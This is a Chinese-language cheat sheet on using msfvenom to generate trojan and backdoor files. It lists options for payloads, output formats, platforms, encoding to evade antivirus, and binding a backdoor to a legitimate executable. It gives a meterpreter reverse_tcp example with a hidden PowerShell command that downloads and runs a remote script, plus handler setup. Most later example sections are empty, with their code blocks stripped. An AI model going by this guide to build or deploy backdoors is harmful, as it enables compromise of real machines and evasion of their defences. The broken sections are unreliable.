msfvenon使用整理
msfvenon生成木马文件:
格式:msfvenom -p
-a –platform -e -i -b -n -f -o
// -e 常用编码 x86/shikata_ga_nai cmd/powershell_base64
// -f指指定的可执行文件类型 -o 指定输出地址。
msfvenom参数解析
1. –p (- -payload-options)
添加载荷payload。
载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以只有选对payload,再填写正确自己的IP,PORT就可以生成对应语言,对应平台的后门了!!!
(- -payload-options 列出payload选项)
2. –l
查看所有payload encoder nops。
3. –f (- -help-formats)
输出文件格式。
(- -help-formats 列出所有文件格式)
Executable formats:
asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-net, psh-reflection, psh-cmd, vba, vba-exe, vba-psh, vbs, war
Transform formats:
bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript
4. –e
编码免杀。
5. –a (- -platform – -help-platforms)
选择架构平台
x86 | x64 | x86_64
Platforms:
windows, netware, android, java, ruby, linux, cisco, solaris, osx, bsd, openbsd, bsdi, netbsd, freebsd, aix, hpux, irix, unix, php, javascript, python, nodejs, firefox, mainframe
6. –o
文件输出。
7. –s
生成payload的最大长度,就是文件大小。
8. –b
避免使用的字符 例如:不使用 ‘0f’。
9. –i
编码次数。
10. –c
添加自己的shellcode。
11. –x | -k
捆绑。例如:原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面。
用法示例:
- msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=<本机ip地址> lport=<本机监听端口> -f psh-reflection -o xx.ps1 //生成文件放在目标机目录下
//powershell执行脚本:powershell -windowstyle hidden -exec bypass IEX (New-Object Net.WebClient).DownloadString(‘http:///xxx.ps1’);xxx.ps1 - use exploit/multi/handler
- set payload windows/x64/meterpreter/reverse_tcp
- show options
- set LHOST=XXX RHOST=XXX
- run
- 目标主机执行木马文件
反向连接:
- linux:
1 |
|
- windows:
1 |
|
正向连接:
- linux:
1 |
|
- windows:
1 |
|
启用exploit/multi/handler模块:
1 |
|
设置PAYLOAD:
- linux:
1 |
|
- windows:
1 |
|
设置参数运行
1 |
|
添加路由
1 |
|
更多实例
- 普通生成
1 |
|
- 编码处理型
1 |
|
- 捆绑
1 |
|
- Windows
1 |
|
- Linux
1 |
|
- MAC
1 |
|
- PHP
1 |
|
- Asp
1 |
|
- Aspx
1 |
|
- JSP
1 |
|
- War
1 |
|
- Bash
1 |
|
- perl
1 |
|
- Python
1 |
|
参数一览
1 |
|